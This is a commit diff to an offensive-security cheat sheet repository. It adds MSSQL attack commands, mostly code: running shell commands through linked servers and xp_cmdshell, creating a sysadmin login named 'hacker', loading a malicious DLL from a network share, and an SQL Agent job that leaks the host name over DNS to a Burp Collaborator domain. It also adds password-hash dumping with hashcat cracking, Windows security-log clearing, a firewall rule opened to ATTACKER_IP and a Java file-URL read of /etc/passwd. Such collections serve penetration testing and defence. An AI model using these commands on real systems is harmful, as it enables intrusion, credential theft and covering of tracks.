MSSQL Agent Command Execution

Directory Traversal/README.md

@@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url:
 ```http://nginx-server////////../../```
 
 
+### Java Bypass
+
+Bypass Java's URL protocol
+
+```powershell
+url:file:///etc/passwd
+url:http://127.0.0.1:8080
+```
+
+
 ## Path Traversal
 
 ### Interesting Linux files

Methodology and Resources/Active Directory Attack.md

@@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt
 Useful when you want to have the clear text password or when you need to make stats about weak passwords.
 
 Recommended wordlists:
-- rockyou (available in Kali Linux)
+- [Rockyou.txt](https://weakpass.com/wordlist/90)
-- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
+- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
-- Weakpass.com
+- [Weakpass.com](https://weakpass.com/)
 - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md)
 
 ```powershell
@@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
 ```
 
 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
-- ~~[hashes.org](https://hashes.org/check.php)~~
 - [hashmob.net](https://hashmob.net)
 - [crackstation.net](https://crackstation.net)
 - [hashes.com](https://hashes.com/en/decrypt/hash)

Methodology and Resources/MSSQL Server - Cheatsheet.md

@@ -14,6 +14,8 @@
 	* [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
     * [Dump common information from server to files](#dump-common-information-from-server-to-files)
 * [Linked Database](#linked-database)
+	* [Find Trusted Link](#find-trusted-link)
+	* [Execute Query Through The Link](#execute-query-through-the-link)
 	* [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) 
 	* [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
 	* [Query Version of Linked Database](#query-version-of-linked-database)
@@ -22,7 +24,7 @@
 	* [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
 	* [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
 	* [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
-	* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
+* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
 * [Extended Stored Procedure](#extended-stored-procedure)
 	* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
 * [CLR Assemblies](#clr-assemblies)
@@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
 
 ## Linked Database
 
+### Find Trusted Link
+
+```sql
+select * from master..sysservers
+```
+
+### Execute Query Through The Link
+
+```sql
+-- execute query through the link
+select * from openquery("dcorp-sql1", 'select * from master..sysservers')
+select version from openquery("linkedserver", 'select @@version as version');
+
+-- chain multiple openquery
+select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+
+-- execute shell commands
+EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
+select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+
+-- create user and give admin privileges
+EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+```
+
 ### Crawl Links for Instances in the Domain 
 A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
 
@@ -195,28 +222,63 @@ Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openque
 ```
 
 
-### Command Execution via xp_cmdshell
+## Command Execution via xp_cmdshell
 
 > xp_cmdshell disabled by default since SQL Server 2005
 
 ```ps1
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
-Creates and adds local user backup to the local administrators group:
+
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add' -Verbose
+# Creates and adds local user backup to the local administrators group:
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
 ```
 
+* Manually execute the SQL query
+	```sql
+	EXEC xp_cmdshell "net user";
+	EXEC master..xp_cmdshell 'whoami'
+	EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
+	EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
+	```
+* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+	```sql
+	EXEC sp_configure 'show advanced options',1;
+	RECONFIGURE;
+	EXEC sp_configure 'xp_cmdshell',1;
+	RECONFIGURE;
+	```
+* If the procedure was uninstalled
+	```sql
+	sp_addextendedproc 'xp_cmdshell','xplog70.dll'
+	```
+
+
 ## Extended Stored Procedure
 
 ### Add the extended stored procedure and list extended stored procedures
 
 ```ps1
+# Create evil DLL
 Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
+
+# Load the DLL and call xp_test
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"
+
+# Listing existing
 Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
 ```
 
+* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
+* Load the DLL
+	```sql
+	-- can also be loaded from UNC path or Webdav
+	sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
+	EXEC xp_calc
+	sp_dropextendedproc 'xp_calc'
+	```
+
 ## CLR Assemblies
 
 Prerequisites:
@@ -322,6 +384,8 @@ GO
 
 ## OLE Automation
 
+* :warning: Disabled by default
+
 ### Execute commands using OLE automation procedures
 
 ```ps1
@@ -365,9 +429,21 @@ Subsystem Options:
 –Subsystem Jscript
 ```
 
+```sql
+USE msdb; 
+EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; 
+EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
+EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; 
+EXEC dbo.sp_start_job N'test_powershell_job1';
+
+-- delete
+EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
+```
+
 ### List All Jobs
 
 ```ps1
+SELECT job_id, [name] FROM msdb.dbo.sysjobs;
 Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
 ```
 
@@ -541,7 +617,13 @@ SELECT SYSTEM_USER
 ### MSSQL Accounts and Hashes
 
 ```sql
-SELECT name, password_hash FROM sys.sql_logins
+MSSQL 2000:
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
+
+MSSQL 2005
+SELECT name, password_hash FROM master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 
 Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
@@ -558,3 +640,4 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.
 * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
 * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
 * [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
+* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)

Methodology and Resources/Windows - Persistence.md

@@ -8,6 +8,7 @@
     * [Antivirus Removal](#antivirus-removal)
     * [Disable Windows Defender](#disable-windows-defender)
     * [Disable Windows Firewall](#disable-windows-firewall)
+    * [Clear System and Security Logs](#clear-system-and-security-logs)
 * [Simple User](#simple-user)
     * [Registry HKCU](#registry-hkcu)
     * [Startup](#startup)
@@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off
 New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
 ```
 
+### Clear System and Security Logs
+
+```powershell
+cmd.exe /c wevtutil.exe cl System
+cmd.exe /c wevtutil.exe cl Security
+```
+
 ## Simple User
 
 Set a file as hidden

SQL Injection/MSSQL Injection.md

@@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee
 
 MSSQL 2005
 SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 
 ## MSSQL Union Based